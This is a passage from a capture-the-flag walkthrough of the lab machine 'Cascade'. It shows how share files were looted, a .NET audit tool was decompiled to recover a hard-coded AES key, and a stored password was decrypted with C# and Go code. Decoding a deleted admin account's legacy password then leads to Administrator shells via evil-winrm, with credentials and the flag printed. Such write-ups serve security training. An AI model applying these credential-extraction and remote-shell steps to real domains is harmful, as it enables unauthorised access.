[+] IP: 10.10.10.182:445	Name: 10.10.10.182                                      
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	Audit$                                            	READ ONLY	
	.\Audit$\*
	dr--r--r--                0 Thu Jan 30 03:01:26 2020	.
	dr--r--r--                0 Thu Jan 30 03:01:26 2020	..
	fr--r--r--            13312 Wed Jan 29 06:47:08 2020	CascAudit.exe
	fr--r--r--            12288 Thu Jan 30 03:01:26 2020	CascCrypto.dll
	dr--r--r--                0 Wed Jan 29 06:43:18 2020	DB
	fr--r--r--               45 Wed Jan 29 08:29:47 2020	RunAudit.bat
	fr--r--r--           363520 Wed Jan 29 05:42:18 2020	System.Data.SQLite.dll
	fr--r--r--           186880 Wed Jan 29 05:42:18 2020	System.Data.SQLite.EF6.dll
	dr--r--r--                0 Wed Jan 29 05:42:18 2020	x64
	dr--r--r--                0 Wed Jan 29 05:42:18 2020	x86
	.\Audit$\DB\*
	dr--r--r--                0 Wed Jan 29 06:43:18 2020	.
	dr--r--r--                0 Wed Jan 29 06:43:18 2020	..
	fr--r--r--            24576 Wed Jan 29 06:43:18 2020	Audit.db
	.\Audit$\x64\*
	dr--r--r--                0 Wed Jan 29 05:42:18 2020	.
	dr--r--r--                0 Wed Jan 29 05:42:18 2020	..
	fr--r--r--          1639936 Wed Jan 29 05:42:18 2020	SQLite.Interop.dll
	.\Audit$\x86\*
	dr--r--r--                0 Wed Jan 29 05:42:18 2020	.
	dr--r--r--                0 Wed Jan 29 05:42:18 2020	..
	fr--r--r--          1246720 Wed Jan 29 05:42:18 2020	SQLite.Interop.dll

To download files with a specific extension, we can use smbmap with the -A option.

root@kali:~# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R Audit$ -A .db
[+] IP: 10.10.10.182:445	Name: 10.10.10.182
[+] Starting search for files matching '.db' on share Audit$.
[+] Match found! Downloading: Audit$\DB\Audit.db
root@kali:~# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R Audit$ -A .exe
[+] IP: 10.10.10.182:445	Name: 10.10.10.182
[+] Starting search for files matching '.exe' on share Audit$.
[+] Match found! Downloading: Audit$\CascAudit.exe
root@kali:~# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R Audit$ -A .bat
[+] IP: 10.10.10.182:445	Name: 10.10.10.182
[+] Starting search for files matching '.bat' on share Audit$.
[+] Match found! Downloading: Audit$\RunAudit.bat
root@kali:~# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R Audit$ -A .dll
[+] IP: 10.10.10.182:445	Name: 10.10.10.182
[+] Starting search for files matching '.dll' on share Audit$.
[+] Match found! Downloading: Audit$\CascCrypto.dll
[+] Match found! Downloading: Audit$\System.Data.SQLite.dll
[+] Match found! Downloading: Audit$\System.Data.SQLite.EF6.dll
[+] Match found! Downloading: Audit$\x64\SQLite.Interop.dll
[+] Match found! Downloading: Audit$\x86\SQLite.Interop.dll

Using the file command, we can see that Audit.db is a SQLite 3.x database file.

root@kali:~# file 10.10.10.182-Audit_DB_Audit.db 
10.10.10.182-Audit_DB_Audit.db: SQLite 3.x database, last written using SQLite version 3027002

To take a look at Audit.db, run the sqlite3 command.
The Ldap table holds a base64-encoded "password" for the user ArkSvc.

root@kali:~# sqlite3 10.10.10.182-Audit_DB_Audit.db 
SQLite version 3.32.3 2020-06-18 14:00:33
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit  Ldap              Misc            
sqlite> select * from LDAP;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> .schema LDAP
CREATE TABLE IF NOT EXISTS "Ldap" (
	"Id"	INTEGER PRIMARY KEY AUTOINCREMENT,
	"uname"	TEXT,
	"pwd"	TEXT,
	"domain"	TEXT
);

However, base64-decoding the value yields binary data, so the password is encrypted rather than merely encoded.

root@kali:~# echo BQO5l5Kj9MdErXx6Q6AGOw== | base64 -d
������D�|zC�;

Next, take a look at RunAudit.bat.
It runs CascAudit.exe with the argument \\CASC-DC1\Audit$\DB\Audit.db.

root@kali:~# cat 10.10.10.182-Audit_RunAudit.bat 
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"

Since we do not have the source code for CascAudit.exe, decompile it with dnSpy.
First, spin up a Windows VM, launch dnSpy and open CascAudit.exe.

Then, navigate the assembly tree as follows to find the Main() function of CascAudit.exe.

  1. CascAudit(1.0.0.0)
  2. CascAudit.exe
  3. {} CascAudiot
  4. MainModule


Source Code:

namespace CascAudiot
{
	// Token: 0x02000008 RID: 8
	[StandardModule]
	internal sealed class MainModule
	{
		// Token: 0x0600000F RID: 15 RVA: 0x00002128 File Offset: 0x00000328
		[STAThread]
		public static void Main()
		{
			if (MyProject.Application.CommandLineArgs.Count != 1)
			{
				Console.WriteLine("Invalid number of command line args specified. Must specify database path only");
				return;
			}
			checked
			{
				using (SQLiteConnection sqliteConnection = new SQLiteConnection("Data Source=" + MyProject.Application.CommandLineArgs[0] + ";Version=3;"))
				{
					string str = string.Empty;
					string password = string.Empty;
					string str2 = string.Empty;
					try
					{
						sqliteConnection.Open();
						using (SQLiteCommand sqliteCommand = new SQLiteCommand("SELECT * FROM LDAP", sqliteConnection))
						{
							using (SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader())
							{
								sqliteDataReader.Read();
								str = Conversions.ToString(sqliteDataReader["Uname"]);
								str2 = Conversions.ToString(sqliteDataReader["Domain"]);
								string text = Conversions.ToString(sqliteDataReader["Pwd"]);
								try
								{
									password = Crypto.DecryptString(text, "c4scadek3y654321");
								}
								catch (Exception ex)
								{
									Console.WriteLine("Error decrypting password: " + ex.Message);
									return;
								}
							}
						}
						sqliteConnection.Close();
					}
					catch (Exception ex2)
					{
						Console.WriteLine("Error getting LDAP connection data From database: " + ex2.Message);
						return;
					}
					int num = 0;
					using (DirectoryEntry directoryEntry = new DirectoryEntry())
					{
						directoryEntry.Username = str2 + "\\" + str;
						directoryEntry.Password = password;
						directoryEntry.AuthenticationType = AuthenticationTypes.Secure;
						using (DirectorySearcher directorySearcher = new DirectorySearcher(directoryEntry))
						{
							directorySearcher.Tombstone = true;
							directorySearcher.PageSize = 1000;
							directorySearcher.Filter = "(&(isDeleted=TRUE)(objectclass=user))";
							directorySearcher.PropertiesToLoad.AddRange(new string[]
							{
								"cn",
								"sAMAccountName",
								"distinguishedName"
							});
							using (SearchResultCollection searchResultCollection = directorySearcher.FindAll())
							{
								Console.WriteLine("Found " + Conversions.ToString(searchResultCollection.Count) + " results from LDAP query");
								sqliteConnection.Open();
								try
								{
									try
									{
										foreach (object obj in searchResultCollection)
										{
											SearchResult searchResult = (SearchResult)obj;
											string text2 = string.Empty;
											string text3 = string.Empty;
											string text4 = string.Empty;
											if (searchResult.Properties.Contains("cn"))
											{
												text2 = Conversions.ToString(searchResult.Properties["cn"][0]);
											}
											if (searchResult.Properties.Contains("sAMAccountName"))
											{
												text3 = Conversions.ToString(searchResult.Properties["sAMAccountName"][0]);
											}
											if (searchResult.Properties.Contains("distinguishedName"))
											{
												text4 = Conversions.ToString(searchResult.Properties["distinguishedName"][0]);
											}
											using (SQLiteCommand sqliteCommand2 = new SQLiteCommand("INSERT INTO DeletedUserAudit (Name,Username,DistinguishedName) VALUES (@Name,@Username,@Dn)", sqliteConnection))
											{
												sqliteCommand2.Parameters.AddWithValue("@Name", text2);
												sqliteCommand2.Parameters.AddWithValue("@Username", text3);
												sqliteCommand2.Parameters.AddWithValue("@Dn", text4);
												num += sqliteCommand2.ExecuteNonQuery();
											}
										}
									}
									finally
									{
										IEnumerator enumerator;
										if (enumerator is IDisposable)
										{
											(enumerator as IDisposable).Dispose();
										}
									}
								}
								finally
								{
									sqliteConnection.Close();
									Console.WriteLine("Successfully inserted " + Conversions.ToString(num) + " row(s) into database");
								}
							}
						}
					}
				}
			}
		}

		// Token: 0x04000008 RID: 8
		private const int USER_DISABLED = 2;
	}
}

The important section is the following.
It reads the encrypted password from the SQLite database and decrypts it with the hard-coded key c4scadek3y654321.

sqliteConnection.Open();
using (SQLiteCommand sqliteCommand = new SQLiteCommand("SELECT * FROM LDAP", sqliteConnection))
{
	using (SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader())
	{
		sqliteDataReader.Read();
		str = Conversions.ToString(sqliteDataReader["Uname"]);
		str2 = Conversions.ToString(sqliteDataReader["Domain"]);
		string text = Conversions.ToString(sqliteDataReader["Pwd"]);
		try
		{
			password = Crypto.DecryptString(text, "c4scadek3y654321");
		}
		catch (Exception ex)
		{
			Console.WriteLine("Error decrypting password: " + ex.Message);
			return;
		}
	}
}
sqliteConnection.Close();

However, CascAudit.exe itself does not contain the definition of Crypto.DecryptString().
It lives in CascCrypto.dll; opening that library in dnSpy shows the function.

public static string DecryptString(string EncryptedString, string Key)
{
	byte[] array = Convert.FromBase64String(EncryptedString);
	Aes aes = Aes.Create();
	aes.KeySize = 128;
	aes.BlockSize = 128;
	aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
	aes.Mode = 1;
	aes.Key = Encoding.UTF8.GetBytes(Key);
	string @string;
	using (MemoryStream memoryStream = new MemoryStream(array))
	{
		using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), 0))
		{
			byte[] array2 = new byte[checked(array.Length - 1 + 1)];
			cryptoStream.Read(array2, 0, array2.Length);
			@string = Encoding.UTF8.GetString(array2);
		}
	}
	return @string;
}

To recover the password, we can write the following .NET program, which reuses the decompiled routine with the hard-coded key and IV.
In fact, if we google the encrypted string BQO5l5Kj9MdErXx6Q6AGOw==, we find that someone has already left this code at https://dotnetfiddle.net/2RDoWz.

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public class Program
{
	public static void Main()
	{
		// Encrypted value from the Ldap table of Audit.db, key hard-coded in CascAudit.exe.
		string str = DecryptString("BQO5l5Kj9MdErXx6Q6AGOw==", "c4scadek3y654321");
		Console.WriteLine(str);
	}

	// Mirrors CascCrypto.DecryptString: AES-128-CBC with the IV compiled into the library.
	public static string DecryptString(string EncryptedString, string Key)
	{
		byte[] buffer = Convert.FromBase64String(EncryptedString);
		using (Aes aes = Aes.Create())
		{
			aes.KeySize = 128;
			aes.BlockSize = 128;
			aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
			aes.Mode = CipherMode.CBC;
			aes.Key = Encoding.UTF8.GetBytes(Key);
			using (MemoryStream memoryStream = new MemoryStream(buffer))
			using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
			using (StreamReader reader = new StreamReader(cryptoStream, Encoding.UTF8))
			{
				// ReadToEnd returns only the unpadded plaintext; the decompiled version
				// read into a fixed-size buffer and kept trailing NUL bytes after the
				// PKCS#7 padding had been stripped.
				return reader.ReadToEnd();
			}
		}
	}
}

w3lc0meFr31nd is the password we can get by running this .NET code.
Then, try to log in with the credential ArkSvc:w3lc0meFr31nd.
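The same decryption as an added example in Go, not code from the walkthrough or from CascCrypto.dll: AES-128-CBC with the key and IV compiled into the binary, followed by explicit PKCS#7 unpadding (the padding .NET's Aes applies by default, which the C# version strips implicitly). The helper names DecryptCascString and pkcs7Unpad are mine; the key, IV and ciphertext are the values the page recovered. Unlike the .NET program, it rejects malformed padding instead of returning garbage, which is the check you want when a wrong key is tried.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
)

// Key and IV exactly as decompiled from CascAudit.exe and CascCrypto.dll.
const (
	cascKey = "c4scadek3y654321"
	cascIV  = "1tdyjCbY1Ix49842"
)

// pkcs7Unpad removes PKCS#7 padding and rejects anything that does not look
// like valid padding (wrong key or tampered ciphertext usually fails here).
func pkcs7Unpad(buf []byte) ([]byte, error) {
	if len(buf) == 0 || len(buf)%aes.BlockSize != 0 {
		return nil, errors.New("plaintext is not a whole number of blocks")
	}
	n := int(buf[len(buf)-1])
	if n == 0 || n > aes.BlockSize {
		return nil, errors.New("invalid padding length")
	}
	for _, b := range buf[len(buf)-n:] {
		if int(b) != n {
			return nil, errors.New("invalid padding bytes")
		}
	}
	return buf[:len(buf)-n], nil
}

// DecryptCascString reproduces CascCrypto.DecryptString:
// base64 decode -> AES-128-CBC under the fixed IV -> PKCS#7 unpad.
func DecryptCascString(b64, key string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not a whole number of AES blocks")
	}
	block, err := aes.NewCipher([]byte(key)) // fails unless key is 16/24/32 bytes
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, []byte(cascIV)).CryptBlocks(pt, ct)
	unpadded, err := pkcs7Unpad(pt)
	if err != nil {
		return "", err
	}
	return string(unpadded), nil
}

func main() {
	// The pwd column of the Ldap table in Audit.db.
	pw, err := DecryptCascString("BQO5l5Kj9MdErXx6Q6AGOw==", cascKey)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Printf("ArkSvc password: %s\n", pw)
}
```

The security lesson is the same as for the VNC value: a fixed key and IV shipped inside a .NET assembly on a share readable by an ordinary group give the stored credential no more protection than base64 would, and a static IV additionally makes equal passwords encrypt to equal ciphertexts.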

root@kali:~/evil-winrm# ./evil-winrm.rb -u ArkSvc -p 'w3lc0meFr31nd' -i 10.10.10.182

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\arksvc\Documents>

As always, check which groups the ArkSvc user is in.
We notice that this user is a member of the group AD Recycle Bin.

*Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvc
User name                    arksvc
Full Name                    ArkSvc
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/9/2020 5:18:20 PM
Password expires             Never
Password changeable          1/9/2020 5:18:20 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/29/2020 10:05:40 PM

Logon hours allowed          All

Local Group Memberships      *AD Recycle Bin       *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

Get-ADObject has an -IncludeDeletedObjects switch that makes the search return deleted AD objects.
Adding -and name -ne "Deleted Objects" to the filter excludes the Deleted Objects container itself, which carries the isDeleted attribute but merely holds the deleted objects.

*Evil-WinRM* PS C:\Users\arksvc\Documents> get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects


Deleted           : True
DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
Name              : CASC-WS1
                    DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
ObjectClass       : computer
ObjectGUID        : 6d97daa4-2e82-4946-a11e-f91fa18bfabe

Deleted           : True
DistinguishedName : CN=Scheduled Tasks\0ADEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2,CN=Deleted Objects,DC=cascade,DC=local
Name              : Scheduled Tasks
                    DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
ObjectClass       : group
ObjectGUID        : 13375728-5ddb-4137-b8b8-b9041d1d3fd2

Deleted           : True
DistinguishedName : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Name              : {A403B701-A528-4685-A816-FDEE32BDDCBA}
                    DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
ObjectClass       : groupPolicyContainer
ObjectGUID        : ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e

Deleted           : True
DistinguishedName : CN=Machine\0ADEL:93c23674-e411-400b-bb9f-c0340bda5a34,CN=Deleted Objects,DC=cascade,DC=local
Name              : Machine
                    DEL:93c23674-e411-400b-bb9f-c0340bda5a34
ObjectClass       : container
ObjectGUID        : 93c23674-e411-400b-bb9f-c0340bda5a34

Deleted           : True
DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
Name              : User
                    DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
ObjectClass       : container
ObjectGUID        : 746385f2-e3a0-4252-b83a-5a206da0ed88

Deleted           : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name              : TempAdmin
                    DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass       : user
ObjectGUID        : f0cc344d-31e0-4866-bceb-a842791ca059

Among them is an interesting deleted user account, TempAdmin.

Deleted           : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name              : TempAdmin
                    DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass       : user
ObjectGUID        : f0cc344d-31e0-4866-bceb-a842791ca059

With the following command, we can view the attributes of a deleted object TempAdmin with GUID f0cc344d-31e0-4866-bceb-a842791ca059.

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Identity f0cc344d-31e0-4866-bceb-a842791ca059 -includeDeletedObjects -Properties *


accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : TempAdmin@cascade.local
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

Just as for r.thompson, the TempAdmin object carries a cascadeLegacyPwd attribute.

cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz

Base64-decoding it yields the password baCT3r1aN00dles.

root@kali:~# echo YmFDVDNyMWFOMDBkbGVz | base64 -d
baCT3r1aN00dles

Using evil-winrm, the same password gives us a shell as Administrator.

root@kali:~/evil-winrm# ./evil-winrm.rb -u administrator -p baCT3r1aN00dles -i 10.10.10.182

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator

As usual, root.txt is in the directory C:\Users\Administrator\Desktop.

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
5ec0a8c63a6e7b1da75c03b4ff7b7c0e

4. References